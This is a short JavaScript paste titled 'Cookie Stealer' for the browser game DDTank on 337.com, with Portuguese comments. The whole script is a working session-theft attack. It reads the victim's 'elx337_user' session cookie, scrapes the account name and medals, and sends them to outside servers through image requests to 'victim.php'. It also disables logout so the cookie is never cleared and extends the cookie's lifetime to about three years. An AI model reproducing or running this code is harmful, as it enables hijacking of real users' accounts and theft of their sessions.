[DDTank] Cookie Stealer

1. /* BY PHOENIX, PORRA */
2. if (!location.href.match("337.com")) {
3.     alert("Por favor, faça em uma página do DDTank!");
4.     return false;
5. };
6. if (!i) {
7.     return false;
8. };
9. if (!document.cookie.match("elx337_user")) {
10.     elex.dialog.show({
11.         type: "text",
12.         value: "Por favor, conecte-se."
13.     }, null);
14.     return false;
15. };
16. player = {
17.     session: document.cookie.match(/elx337_user=(.+);/)[0].split("=")[1].split(";")[0],
18.     name: undefined,
19.     medals: undefined
20. };
21. if (location.href.match("br.337.com")) {
22.     $.ajax({
23.         url: "/user/profile",
24.         success: function (x) {
25.             player["name"] = x.match(/headUserName">(.+)</)[0].split(">")[1].split("<")[0];
26.             player["medals"] = x.match(/<font>(.+\/.+)/gi)[0].replace('<b>', '').replace('</b>', '').split('>')[1].split('<')[0];
27.             new Image().src = "http://site.com.br/php/victim.php?session=" + escape(player.session) + "&name=" + escape(player.name) + "&medals=" + escape(player.medals) + "&i=" + i;
28.             elex.dialog.show({
29.                 type: "text",
30.                 value: "<b>" + player.name + "</b>, aguarde um pouco, ok?"
31.             }, null);
32.         }
33.     });
34. };
35. if (location.href.match("apps.337.com")) {
36.     $.ajax({
37.         url: "/ddtank",
38.         success: function (x) {
39.             player["name"] = x.match(/headUserName">(.+)</)[0].split('>')[1].split('<')[0];
40.             player["medals"] = "[Indefinido]";
41.             new Image().src = "http://thewixproject.com.br/php/victim.php?session=" + escape(player.session) + "&name=" + escape(player.name) + "&medals=" + escape(player.medals) + "&i=" + i;
42.             elex.dialog.show({
43.                 type: "text",
44.                 value: "<b>" + player.name + "</b>, aguarde um pouco, ok?"
45.             }, null);
46.         }
47.     });
48. };
49. // Coloquei no botao de sair apenas para fechar a pagina e para que o cookie da vitima nao seja apagado
50. $("#elexlogout").click(function () {
51.     window.close();
52.     return false;
53. });
54.  
55. function setCookie(c_name, value, exdays) {
56.     var exdate = new Date();
57.     exdate.setDate(exdate.getDate() + exdays);
58.     var c_value = escape(value) + ((exdays == null) ? "" : "; expires=" + exdate.toUTCString());
59.     document.cookie = c_name + "=" + c_value;
60. };
61. // Prendendo o cookie no dominio por tres anos, teoricamente, deixando ele inexpiravel.
62. setCookie("elx337_user", player.session, 999);